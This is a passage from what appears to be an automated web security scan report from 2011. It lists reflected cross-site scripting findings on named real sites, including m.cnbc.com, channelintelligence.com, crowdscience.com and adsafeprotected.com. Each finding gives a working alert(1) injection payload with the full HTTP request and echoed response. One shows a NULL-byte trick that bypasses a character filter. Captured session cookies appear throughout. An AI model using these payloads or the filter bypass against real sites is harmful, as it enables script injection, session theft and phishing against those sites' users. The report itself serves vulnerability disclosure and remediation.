gpw_e24=http%3A%2F%2Fblogs.oracle.com%2Fotn%2Fentry%2Fbea_welcome_and_oracles_middle; s_sq=oracleblogs%2Coracleglobal%3D%2526pid%253Dblogs%25253Aen-us%25253A%25252Fotn%25252Fentry%25252Fbea_welcome_and_oracles_middle%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fblogs.oracle.com%25252Froller-ui%25252Flogin-redirect.rol%2526ot%253DA; OAM_REQ=VERSION_4~J%2bfeWWARH78WMpFJOLLGVUaRBF0iddeiIoA1LmJs3Zi2CBr930JrQXvEg5gR0D8CAKQpein0puIJXVs1LFOsylMRwLPa8jg%2bXGpdVzIgWlvOmNfLCLjGzyojV1e4Vsk17THxQww8kKlGYXjlBF8phTLPz7FI%2bA5qofyVKAyO62Bauuu8qVF1ScS09pAcprUPivm3VFJ3H5Kgz%2flJzu7m9%2f1lXhQDZkvLYt%2bMMnr4kZSTqEAn9vkNTKCbSHhBs0EUMI62DsRPc2MSDv4g1v0UwyMn3mebBESr8TTmvRhios3MzyBQhvf4I8rM%2fwXpbFtlj2kGJ%2fPqDr5kNPmwYSFtqmYYyGN4nDSX09LufeZZN3FlT9ZvAMl4iCN9nhBlvG%2f%2fTaJw60iM1r1bkP3UdKVDfmpD8NuXDMqMi4EmV59%2fDEO%2fCYluZce8U%2bGGbT0K9o1sJA4XjxLL8%2f8AfNO%2fwgLKh%2bDofILOF3mRDkIRf68MKMzc7HUeCDu5YQ%2f1ao%2btvjJSu1MtNbwWjD8UmI6Bp%2bTRkGCB7OF6jAdOMmIOVBu7THJ6KSU4L2SAbPlMUQlqLLsH%2fcJMIXtw%2fqvMnBDKHrGSfc6r0RkyylnyMFuScSmd2qNULSeekz8BY7KTly4hiDnDSMlMYTLsixuo8%2b9NDEIshLoOT5kTmeXiCg0FTyr8YewQcLMAvb%2bbfWK8%2f54EneCznHCw32Dn13%2f%2b2dACr4TQeKM9Oua%2f%2bwnu%2bOKIUvCRMS7vWgTjRO5gee3ULhUyKtCENay%2bEYtLfegFYrD2T0tDzB1GcqWTZNEakL6GXMmgGKiTmFoSSXp8dcSso8oEAuAiYBSqM5GloP4Tob3Eft%2fPItNWUsY%2bqbZrilhUtsGtHuzBCTxKPfedNGX1FZuFxXwXbxwkdlHTEmzyTEyl%2fk2aJmyp8Ow%2fyV0o9SYR315eigxpsxzO3ZMFEmBad28OBM9tv5Pvi9O7Ri7Q%2bEXUOC%2f6G2f3htenFJenmnMekNtGu%2fXfaFZL8GjhhVe5W2JhMe%2bJLRaBu8X6ZoE54ocXwfJwUo5hV8m0jaq6DZYEXyrG149pUJzc6I26AH9jHtgcxBbozuQyyY7iwuNWhOqKPudiCfywcM6XktYPrp2zFS3bTkcQ8Rm6HRrZb%2fvB%2bACTy9lrXfSV77QwN%2buu6srum69cLBP5lmPul32t8OVdMpNiivhpmtV7Dbbe5zn%2bkIHj0PhVUbDcErrcfZVnIYDRRjINSbq089YfH3YmFdPktBdvcIhNNztLg2Tbbvh%2fD4y50BLNBJCH%2b8a6B8NLIOqiOoU%2fCEYSRHDnFZv5HTMnTiqJZ%2bljcmdaGu3BPZkHEknjwJ%2frdJN%2fF4KZDIxyB3z0Gc63SxU5%2bTOVa2gKg9LLQNB2%2bsQr1foYzGQLqnMUwF00FaWT2AYkTr5c%2fdnUfUIBSwOj5Q05wkiqOMB51WrBiy3GxzQhmyIU1H7mWj7BSJ%2f010hrRBg%2bfmeiP3OsSN7fXl67GS9KXjTcmXcpDpxRcQH8ZtVHtHmu8ImroMw8P6EovYOrU6HMbmDgwrjXvJbIlFOtbYI56UcoWsOz8MB99rzf65Ik4OZR0TJ7aAd2xC8u19T21z0udibFuvVGvxJuHLh%2f5w%3d%3d; BIGipServerloginadc_oracle_com_http=1561105037.16927.0000
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 16:17:10 GMT Set-Cookie: OAM_REQ=VERSION_4~kFAC1XaMEpaJ8SJOUrf%2fWt2Eo7fTd6kx5GkSobJXbTa9ofaZvm8X1pAbDFt2MEuS3MePYuT%2fmFC6jCqPOKsg5EGn8%2f5siYPls53KS2IfE5cAKYqV2nwLNlXuhTnUYD7%2bqgU6DNG1zrFdSZwFZvxFyciZDIbbbnhH9oRg0ceM1muAJi1B5fV43af5UynsM4YyGgbbfAlBREllNguLNsO9pgPSAgLfyd4J8jO1mR8hmBly2Qe1K8Tieg3%2fXbAEmyHqq8mBg8gmx4%2f7JOAbCcxazh%2brWrBI91l82SUGo8jfrb6mv7Am3WPBKU1mn48kN%2bqo2VJzi7%2fsLFGYYAnXWBwN7TjAFSkQzufA1dxnEwxBoVrJBif6NqyI5sc73QqvYIVs5s2uSoVB7OG4vusTIrSC3M1J%2bXw34SlfE6bwoWG7hXLJu%2fxGFD7tU7q6cnoKfMLgmk3RVX0WkuFW3l%2bNIRESpgSboEw1l80kwLoK5SB9TZhJ9U9B1LLNAKsjfaXmnYo7qK%2f9ATN1N7IxQht%2fXXmrWmsgSPIJWSCwMMYOqQ2mKce34pt0uSUhsDaGJrlfznnWIuParzsU26PBHAKlJlGGCAFsC1XiJQ9pygZGlYY7vWScqX37bn%2b%2fhLbSwbUQQu0y5z98Ulo%2b5IFLEPHYoOYJaWY4IuX%2fO0vKkiR8QgbH4bg%2fM6onyO9R%2f%2fdVrHGJJrJ%2fKrj00c%2fla7ybboS2B2PSyDf2BWQfi9EP5CMv8xmSwUVWpEf8YztPrfG6JBJt6sFIFZXLYyL9c3Lgh0Js63KCgdgTX5zatHuB9iQ%2b9vr%2bSHXkhdlkcTjBT3rKbEsEpxSgv2lavD2cqY8YSS2jwLZEvEcR1er6uRFGqya1OarXmPCdtpVogeosgxLQ%2bUAptgSI2sbJyRV%2f8fFlCu3WRB0otUeqy4dOida3y5yQ9mxxFfQar9jsGGvnEeX%2bhhsHo2PXtKnmfuGfUwyR6C8THvE4579RVsK84IEbwdym4Y0jvuQSFW81brTJ2JzejPjySRJDjAtdxl%2faO6SSI1B4FGvXS9lvaTvmPKCntQ%2bjbtwuN1kY7tjw9qplEyyxRJcA3ssOLdIvA4zwuVU0HwhaV4geRx7Uf94lsiEExtzGV2WPn9Y%2bc3X37HfRS3VshKqfNvksWF%2bbnL9fJRo3Z6V9Ho8BR3NbO%2bw%2fb4SPOP1grldEk6sBfPdD9knTg%2fTP1uM2ut2wR7doZ9YcUJZZ16%2f9trfZqHMjEX%2fiaKguZr46uYqTab2AK6dpfBmLNhNogN%2fPjJDVvbSwgJVDCXWY%2fPHLL4myDtby3Eyw7NQPgCUCK9s4T3NIUumy4Cnja86gM49x2Qa98H5TvFvv%2bzTMtB5yKYmSJfnpGViX0DZbiyV1E%2fZDQMP4btXxU3PTgqGbXx8ZYi3s61ou3twd3XAy8ulz4Z4BfaU7A%2fL2aB%2fSJzq8R%2f%2bdvQoskKYNJ39BX8ZIGoecc3vJTrnbVRFebOhc5P93wpRnhOeMughVxlUGmxnSx7ZiuirRQudGH4E8O7spt2Aaf5abIr62aflBa7yvQT%2bph5eVgyNyrS4P1OF%2f9oiDfhf8bb647N0kyr3JPyNDScpyqObS9CMjaVJUkcWKS7uakG8Vwsc1ndOVxHQRr8H1rW3SC3g3EfEzukgorgSTEWVMVk1Jm%2fUa2XDd89JKZHQJ3GMb5oZeTSn%2fR%2fFnUJr8OjZcE6BpcWS73EZN3WPDKjFkm8NVwKJGRXNcAwTWsca3SJEOOA%3d%3d; path=/; HttpOnly X-ORACLE-DMS-ECID: 0000J8zXqFk6uHK6EVADUS1EHWFB01tasY X-Powered-By: Servlet/2.5 JSP/2.1 Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:17:10 GMT; path=/ Content-Length: 2386 <html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p...[SNIP]... <input type="hidden" name="request_id" value="-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029 ">...[SNIP]...
3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.cnbc.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c45'-alert(1)-'fbc41ead6d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?62c45'-alert(1)-'fbc41ead6d9 =1 HTTP/1.1 Host: m.cnbc.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; __qseg=Q_D; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339390340; s_sq=%5B%5BB%5D%5D
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:05:12 GMT Server: Apache X-Powered-By: PHP/5.2.10 Expires: 0 Last-Modified: Tue, 06 Sep 2011 15:05:12 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Via: 1.1 aicache6 Content-Length: 13408 X-Aicache-OS: 64.210.193.250:80 Connection: Keep-Alive Keep-Alive: max=20 <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head>...[SNIP]... <script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/?62c45'-alert(1)-'fbc41ead6d9 =1&refresh=true\'',300000)</script>...[SNIP]...
3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.cnbc.com
Path:
/favicon.ico
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e284c'-alert(1)-'58c7eb2456a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /favicon.icoe284c'-alert(1)-'58c7eb2456a HTTP/1.1 Host: m.cnbc.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: s_cc=true; s_nr=1315339276909; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/memberCenter.do%2526ot%253DA; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2003|Q_2001|Q_1997|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_320|Q_316; __qca=P0-1990433296-1315339228713; SESS93eea98f293ea8fd633599e480cddfdc=7hpvssf67odmb1il9onl52ot53; s_vi=[CS]v1|27331BA1051D06AC-4000010700020B59[CE]; rnmd_test=x; rnmd_uuid=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:08:29 GMT Server: Apache X-Powered-By: PHP/5.2.10 Vary: Accept-Encoding Keep-Alive: timeout=5, max=99 Content-Type: text/html; charset=utf-8 Via: 1.1 C aicache6 Content-Length: 4010 X-Aicache-OS: 64.210.193.252:80 Connection: Keep-Alive Keep-Alive: max=20 Expires: Wed, 07 Sep 2011 15:08:30 GMT <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head>...[SNIP]... <script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/favicon.icoe284c'-alert(1)-'58c7eb2456a ?refresh=true\'',300000)</script>...[SNIP]...
3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.cnbc.com
Path:
/mytest/ipecho.php
Issue detail
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e92'-alert(1)-'f261e685920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mytestc3e92'-alert(1)-'f261e685920 /ipecho.php HTTP/1.1 Host: m.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:16 GMT Server: Apache X-Powered-By: PHP/5.2.10 Expires: 0 Last-Modified: Tue, 06 Sep 2011 15:05:16 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Via: 1.1 aicache6 Content-Length: 4643 X-Aicache-OS: 64.210.193.251:80 Connection: close <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head>...[SNIP]... <script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytestc3e92'-alert(1)-'f261e685920 /ipecho.php?refresh=true\'',300000)</script>...[SNIP]...
3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://m.cnbc.com
Path:
/mytest/ipecho.php
Issue detail
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59238'-alert(1)-'0408d9d8ef3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3 HTTP/1.1 Host: m.cnbc.com Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D
Response
HTTP/1.1 404 Not Found Date: Tue, 06 Sep 2011 15:05:20 GMT Server: Apache X-Powered-By: PHP/5.2.10 Expires: 0 Last-Modified: Tue, 06 Sep 2011 15:05:20 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Via: 1.1 aicache6 Content-Length: 4642 X-Aicache-OS: 64.210.193.252:80 Connection: close <!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head>...[SNIP]... <script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3 ?refresh=true\'',300000)</script>...[SNIP]...
3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://netsuite.tt.omtrdc.net
Path:
/m2/netsuite/mbox/standard
Issue detail
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9ed34<script>alert(1)</script>42adcdc5dfa was submitted in the mbox parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa &mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1 Host: netsuite.tt.omtrdc.net Proxy-Connection: keep-alive Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:33:19 GMT; Path=/m2/netsuite Content-Type: text/javascript Content-Length: 214 Date: Tue, 06 Sep 2011 15:33:18 GMT Server: Test & Target mboxFactories.get('default').get('me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa ',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");
3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pg.links.channelintelligence.com
Path:
/pages/CBLJS.asp
Issue detail
The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3d3c'%3balert(1)//7a40c4d48d9 was submitted in the sLinkJSData parameter. This input was echoed as f3d3c';alert(1)//7a40c4d48d9 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pages/CBLJS.asp?sLinkJSData=upc%3D047400098978f3d3c'%3balert(1)//7a40c4d48d9 &cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1 Host: pg.links.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 35613 Cache-Control: public, max-age=3563 Expires: Tue, 06 Sep 2011 17:45:22 GMT Date: Tue, 06 Sep 2011 16:45:59 GMT Connection: close function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();} function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();} /*...[SNIP]... 610","middle","center",true,"",true,false,false,false,true);goWin.focus();} function cii_VARInfo(rsCustomer,rsZip,rsSKU,rnRGID,nPGID,nVID,nRadius,nHeight,nWidth,sStatusBar){var sUrl='?upc=047400098978f3d3c';alert(1)//7a40c4d48d9 &cii_nSCID=28&cii_nCTID=29&cii_sZip='+rsZip+'&cii_sSKU='+escape(rsSKU).replace('+','%2B')+'&cii_nVID='+nVID+'&cii_nRGID='+rnRGID+'&cii_nPGID='+nPGID+'&cii_nRadius='+nRadius;var oWin=ykb_PopUp('VARInfo'...[SNIP]...
3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pg.links.channelintelligence.com
Path:
/pages/CBLJS.asp
Issue detail
The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94563"%3balert(1)//be0c49fb5ff was submitted in the sLinkJSData parameter. This input was echoed as 94563";alert(1)//be0c49fb5ff in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pages/CBLJS.asp?sLinkJSData=upc%3D04740009897894563"%3balert(1)//be0c49fb5ff &cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1 Host: pg.links.channelintelligence.com Proxy-Connection: keep-alive Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" X-Powered-By: ASP.NET Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 35613 Cache-Control: public, max-age=3554 Expires: Tue, 06 Sep 2011 17:45:08 GMT Date: Tue, 06 Sep 2011 16:45:54 GMT Connection: close function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();} function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();} /*...[SNIP]... ocID="+rnLocID+"&cii_nRGID=1964&cii_nPGID=0&cii_nRadius=15";document.location = sUrl;} function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVStoreID,rnColPos){var sUrl="?upc=04740009897894563";alert(1)//be0c49fb5ff &cii_nSCID="+rnSCID+"&cii_nCTID="+rnCTID+"&cii_sZip=&cii_nIID=163810295&cii_sSKU="+escape("047400098978").replace("+","%2B")+"&cii_nVID="+rnVID+"&cii_nLocID="+rnLocID+"&cii_nStoreID="+rnStoreID+"&cii_n...[SNIP]...
3.59. http://ping.crowdscience.com/ping.js [m parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ping.crowdscience.com
Path:
/ping.js
Issue detail
The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %006c87d'%3balert(1)//7d11b67251b was submitted in the m parameter. This input was echoed as 6c87d';alert(1)//7d11b67251b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0%006c87d'%3balert(1)//7d11b67251b &vn=2.0.4 HTTP/1.1 Host: ping.crowdscience.com Proxy-Connection: keep-alive Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:33:02 GMT Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2 Set-Cookie: __csv=53404c51af1f5e49; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:33:02; Path=/ Content-Length: 8035 P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml" Connection: close Content-Type: text/plain (function (){ var cs = CrowdScience; cs.state = 1; // cs.states.ping_loading; cs.invitation_beforeShow = function() {}; cs.invitation_afterShow = function() {}; cs.i...[SNIP]... f5524dcb2c411c47c&vguid=53404c51af1f5e49&sc=eNotjEEOwjAMBP/icxTZ3tiO8xtUhOBURIs4IP5OKnVPc5jZLz0/NKRyoff9sW80oECE1QyzFFZkoW25ndJledEw5oOv62R4heicNFEGZyu07CuNqTA3tc4yj6CR4q6Fjki9uvZEWkTL9I7fH93NH90=&m=0.6c87d';alert(1)//7d11b67251b &style=' + self.style; return self; })(); CrowdScience.imageUrls = [ 'http://static.crowdscience.com/invlogo/dir02/logo_2_59cd36bf0aee...[SNIP]...
3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://pixel.adsafeprotected.com
Path:
/jspix
Issue detail
The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 510c5"-alert(1)-"dd817178b4e was submitted in the anId parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jspix?anId=144510c5"-alert(1)-"dd817178b4e &pubId=4749&campId=176996 HTTP/1.1 Host: pixel.adsafeprotected.com Proxy-Connection: keep-alive Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
